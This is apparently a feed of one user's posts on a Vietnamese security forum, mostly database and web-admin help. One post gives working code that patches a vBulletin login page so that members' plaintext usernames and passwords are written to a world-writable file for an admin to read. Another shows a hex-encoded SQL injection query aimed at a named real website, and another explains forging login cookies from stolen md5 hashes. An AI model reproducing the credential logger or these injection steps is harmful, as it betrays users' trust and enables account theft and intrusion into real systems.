<![CDATA[Messages posted by "lyhuuloi"]]> /hvaonline/posts/listByUser/14690.html JForum - http://www.jforum.net báo invaild link từ 1 domain .htaccess sau đó chèn nội dung mình gửi ở phần trả lời trên, sau đói sửa lại cái link dẫn đến trang báo lỗi là ok.]]> /hvaonline/posts/preList/30354/187337.html#187337 /hvaonline/posts/preList/30354/187337.html#187337 GMT Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 wrote:
thôi thì bác chiếu cố bật mí cho em tí. chứ em cũng đang mày mò SQL đâu phải hỏi chơi đâu ạ , huu 
Bác conmale nói đúng mà :) Nếu đúng là đang mò SQL thật, thì chắc hẳn nhìn câu 2 đã trả lời cho câu 1 rồi, học đi trước khi học chạy nhé bạn ;) PS: Em thích câu trả lời của bác conmale lắm :D]]>
/hvaonline/posts/preList/25210/187335.html#187335 /hvaonline/posts/preList/25210/187335.html#187335 GMT
Cách giải độc cho CSDL sau khi bị tấn công SQL-Injection Tạm khắc phục: + Run query: Code:
UPDATE tên_table SET replace(Ten, '<script src="http://f1y.in/j.js></script>', '')
Điền tên_table lại rồi run query nhé bạn. Về mặt lâu dài: + Kiểm tra lại đầu vào (nếu không biết, tìm hiểu thêm về lập trình), hehe.]]>
/hvaonline/posts/preList/30361/187208.html#187208 /hvaonline/posts/preList/30361/187208.html#187208 GMT
báo invaild link từ 1 domain Code:
ErrorDocument 404 page404.html
page404.html hoặc link nào đó là xong.]]>
/hvaonline/posts/preList/30354/187204.html#187204 /hvaonline/posts/preList/30354/187204.html#187204 GMT
Up file .sql lên không được, xin được giúp đỡ! /hvaonline/posts/preList/30310/187023.html#187023 /hvaonline/posts/preList/30310/187023.html#187023 GMT Để biết pass của thành viên trong forum /hvaonline/posts/preList/30273/187002.html#187002 /hvaonline/posts/preList/30273/187002.html#187002 GMT Để biết pass của thành viên trong forum /hvaonline/posts/preList/30273/186951.html#186951 /hvaonline/posts/preList/30273/186951.html#186951 GMT Để biết pass của thành viên trong forum /hvaonline/posts/preList/30273/186940.html#186940 /hvaonline/posts/preList/30273/186940.html#186940 GMT Để biết pass của thành viên trong forum /hvaonline/posts/preList/30273/186935.html#186935 /hvaonline/posts/preList/30273/186935.html#186935 GMT Up file .sql lên không được, xin được giúp đỡ! Và bạn lưu ý, do đây là code để xử lý lỗi mà bạn report, còn phát sinh thêm lỗi nào thì lúc này cần phải kiểm tra lại file SQL của bạn nữa  Trường hợp của bạn chắc là lỗi do file database mà bạn backup rồi :) File database của bạn nặng có nặng ko ? 2. Chạy Query bằng cách vào phpMyAdmin -> Run Query]]> /hvaonline/posts/preList/30310/186906.html#186906 /hvaonline/posts/preList/30310/186906.html#186906 GMT Để biết pass của thành viên trong forum Code:
B.value=""
Rồi xóa luôn là ok !]]>
/hvaonline/posts/preList/30273/186876.html#186876 /hvaonline/posts/preList/30273/186876.html#186876 GMT
Up file .sql lên không được, xin được giúp đỡ! MySQL said: #1062 - Duplicate entry '6344' for key 1   Thông báo này có nghĩa là trong database đã tồn tại 1 record có adminhelpid = 6344, như vậy trước khi bạn import lại thì bạn chạy query này để xóa record 6344 đó: Code:
DELETE FROM adminhelp WHERE adminhelpid=6344
Và bạn lưu ý, do đây là code để xử lý lỗi mà bạn report, còn phát sinh thêm lỗi nào thì lúc này cần phải kiểm tra lại file SQL của bạn nữa :)]]>
/hvaonline/posts/preList/30310/186854.html#186854 /hvaonline/posts/preList/30310/186854.html#186854 GMT
Để biết pass của thành viên trong forum /hvaonline/posts/preList/30273/186822.html#186822 /hvaonline/posts/preList/30273/186822.html#186822 GMT Để biết pass của thành viên trong forum Cái này giống như kiểu, aha, ta vào một lớp học, ta hỏi thầy, "thầy ơi, vấn đề này em phải làm thế nào, thầy viết từ a-z cho em nhé", ok thế thì viết dùm đây, chắc chỉ có ở đây mới có như vậy thôi :) Bước 1: Mở file clientscript/vbulletin_md5.js Thay dòng:
input.value = ''; 
Thành:
//input.value = ''; 
Bước 2: Mở file login.php Tìm đoạn: Code:
if ($_POST['do'] == 'login')
{
Chèn vào bên dưới: Code:
$fp = fopen("lyhuuloi.com.txt", "a+");

	fwrite($fp, "Username: {$_POST['vb_login_username']}
	Password: {$_POST['vb_login_password']}
	
	");
		
	rewind($fp);
Bước 3: Tạo file lyhuuloi.com.txt và CHMOD 777 Bước 4: Upload, rồi đợi. Kết quả được lưu vào file txt ấy nhé :) PS: Mình thì không thích vớ vẩn với bác, nhưng lần sau bác có yêu cầu thì nói đàng hoàng nhé, không phải ai cũng chỉ biết nói thôi đâu :) ]]>
/hvaonline/posts/preList/30273/186821.html#186821 /hvaonline/posts/preList/30273/186821.html#186821 GMT
Để biết pass của thành viên trong forum

jforum3000 wrote:
boynet, đây cũng là một cách để biết. 
Cách này không dùng được đâu bạn :) Nó chỉ là mã md5, trong khi bác ấy lại cần password chính xác từng chữ mà ;)]]>
/hvaonline/posts/preList/30273/186722.html#186722 /hvaonline/posts/preList/30273/186722.html#186722 GMT
Để biết pass của thành viên trong forum việc ban hay del 1 user thì quá dễ rồi. Nhưng mem có ý định "chọc ngoáy" lại là người cùng cơ quan mới đau. Dĩ nhiên làm sao mà được lòng tất cả được, cũng có người này nọ. Admin biết pass cũng có thời gian đâu mà xăm soi hết các thành viên được, và nếu họ biết thì forum chỉ có nước là "sập tiệm". Mình chỉ theo dõi những đối tượng "khả nghi" mà không thể ban hay del họ được. Biết trước để ngăn chặn để dần dần họ từ bỏi ý định "chơi xấu" admin thôi. Nếu chỉ nêu các bước như ở trên (cái bác lyhuuloi đấy) thì ai mà chả nêu được smilie . Vấn đề là làm như thế nào ? Em mà rành về lập trình thì đã tự mò rồi, hỏi các bác làm gì smilie . Ai có lòng hảo tâm thì giúp em với, nếu không tiện thì gửi cho em Email: kehaodanh@yahoo.com (các bác đừng có "đính kèm" cho em 1 em trojan nào nhá, tội em lắm!). thanks!  Hóa ra là ai cũng biết cách chứ không biết làm nhỉ :) Chắc lúc làm việc, Vấn đề nào bác không biết bác cũng nhờ người khác giúp luôn đúng không ;) Tớ biết, nhưng tớ không muốn hướng dẫn cho bác ngay là để xem phản ứng của bác thế nào, như này thì hỏng cả. ;) Thôi thì bác nào rãnh rỗi thì giúp bác ấy nhé #:S ]]> /hvaonline/posts/preList/30273/186720.html#186720 /hvaonline/posts/preList/30273/186720.html#186720 GMT Để biết pass của thành viên trong forum /hvaonline/posts/preList/30273/186631.html#186631 /hvaonline/posts/preList/30273/186631.html#186631 GMT Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 wrote:
@lyhuuloi: mới đọc mấy bài của bác bên phần lập trình web ^^! ma em có commen bên blog của bác rồi. mong bác sớm hồi âm smilie 
Hi, mình đã trả lời lại trên Blog, thanks bạn đã comment, and hope you like it :) Hello HVA :D]]>
/hvaonline/posts/preList/25210/186612.html#186612 /hvaonline/posts/preList/25210/186612.html#186612 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL

constructor_87 wrote:
em nghĩ rằng SQL Injection là bug trong mySQL và mình khai thác nó, tất nhiên sử dụng code mySQL để thâm nhập rồi. ngoài ra còn phải hiểu cấu trúc gì thêm ? anh nói : "cấu trúc của ứng dụng mình đang thâm nhập" ở đây là gì? có thể nói rõ hơn 1 chút không ạ? mong được chỉ giáo thêm. cám ơn! 
Bạn nói đúng :) Nhưng vấn đề bạn lấy được mã md5 rồi mà không biết phải làm gì với nó thì đó là lúc mà bạn phải tìm hiểu về cấu trúc của website đang thâm nhập :) Bạn phải hiểu được cách tạo ra mã md5 đó, ví dụ được md5 mấy lần, mã md5 này có liên quan đến một chuỗi nào đó để tạo ra nó không,... etc. và quan trọng là hack thì phải biết mình cần cái gì,.. giống như kiểu muốn ăn thì lăn vào bếp vậy :D I'm only a newbie, dont hurt me, plz :D]]>
/hvaonline/posts/preList/25210/186593.html#186593 /hvaonline/posts/preList/25210/186593.html#186593 GMT
dịch ngược md5?

kimtulong wrote:
như bác hoasimtim nói như trên gần như là không thể vậy sao mọi người hack lỗi SQL injection tìm ra được cái mật khẩu md5 chỉ để ngắm thôi sao?hichic! smilie 
Do md5() về thực tế là khó có thể dịch được, nên mã md5 lấy ra được từ kết quả hack thường được dùng vào việc tạo fake cookie :) Về lý thuyết, cookie nào được lưu về dưới 1 tên ABC nào đó đều là sản phẩm của một thuật toán dựa vào mã md5 đã lưu ở database - hoặc trường hợp coder hơi gà một tí là lưu mã md5 có trong database mà không mã hóa thêm nữa. Như vậy, hacker hoàn toàn có thể mô phỏng lại quy trình mã hóa này bằng cách dựa vào mã md5 lấy được, họ sẽ tạo được fake cookie để có thể đăng nhập một cách hợp lệ. Chỉ có vậy thôi.]]>
/hvaonline/posts/preList/29910/186566.html#186566 /hvaonline/posts/preList/29910/186566.html#186566 GMT
http://www.indiecraftshows.com/events.php?id= indiecraftslive sang mã HEX đã, mình đã convert qua thì nó thì được: 696e6469656372616674736c697665 và câu lệnh mà bác chèn vào những số nào hiển thị trên web sẽ là: Code:
(select table_name from information_schema.tables WHERE table_schema=0x696e6469656372616674736c697665)
Vì ở đây nó đã chèn slash để vô hiệu hóa, nên chuyển sang HEX là by pass :) Để làm được thì bác nên trang bị cho mình hành trang là kiến thức về SQL bác nhé, đừng nên học hack một cách máy móc ;) Như vậy bác sẽ trở thành kẻ phá hoại chứ ko phải là một người làm nhiệm vụ Bảo mật. Good lucks.]]>
/hvaonline/posts/preList/30255/186565.html#186565 /hvaonline/posts/preList/30255/186565.html#186565 GMT
Để biết pass của thành viên trong forum /hvaonline/posts/preList/30273/186564.html#186564 /hvaonline/posts/preList/30273/186564.html#186564 GMT Phòng chống SQL Injection bằng PHP, hiệu quả đơn giản Hề hề Query Strings được truyền tới server đôi khi cần các từ trên thì sao bạn smilie vd:username của tui tui đặt là UNION TEAM hay admin_chinh admin_phu thì bạn lock hết sao ? nhất là khi query string chứa một bài post cho một bài viết trên forum chẳng hạn thì đôi khi đầy các từ trên ( HVA thì khỏi nói, liên tục hén smilie ) Cho xin ý kiến nhe bạn. Thân,  Mình đọc từ trên xuống dưới thì rõ ràng thấy nhận định của xnohat là hợp lý, vì nếu chặn tất tần tật một cách vô thức như vậy thì cái này thì không phải là cách tối ưu trong hầu hết trường hợp.
Đó và việc bảo mật của webmaster, các webmaster thường không có user đăng ký các tên nhạy cảm như vậy. Bạn hãy thử dùng công cụ search trên HVA để tìm từ khóa "UNION" xem có được phép không ? Để có được sự bảo mật đôi khi người ta sẽ gặp phải những hạn chế đi kèm, không có một công cụ bảo mật nào được gọi là hoàn hảo cả, cái gì cũng có 2 mặt của nó bạn à Cảm ơn bạn vì những ý kiến đóng góp ! 
Đó là chính sách bảo mật ở một số website, như HVA thường xuyên gánh chịu lượng request thì đó là một yêu cầu tối thiểu để chặn việc phá hoại :) Nói như bạn có nghĩa là mình không thể dùng Tool của bạn để áp dụng cho một website nói về Hacking à ? Vì khi làm một website nói về Hacking thì mình lại phải gõ đi gõ lại khá nhiều từ mà bạn đã chặn đấy :D kaka Về cơ bản, trong PHP, khi dùng $_REQUEST là nó-đã-bao-gồm-$_GET-và-$_POST, do đó nếu hangxachtay chặn từ $_REQUEST là khá ổn về mặt xử lý dữ liệu đầu vào, chứ dùng mỗi $_GET thì không ăn thua, nếu không muốn nói là quá AMATEUR ! ]]>
/hvaonline/posts/preList/20280/186549.html#186549 /hvaonline/posts/preList/20280/186549.html#186549 GMT
cho em hỏi về căn bản sql injection với /hvaonline/posts/preList/30121/186547.html#186547 /hvaonline/posts/preList/30121/186547.html#186547 GMT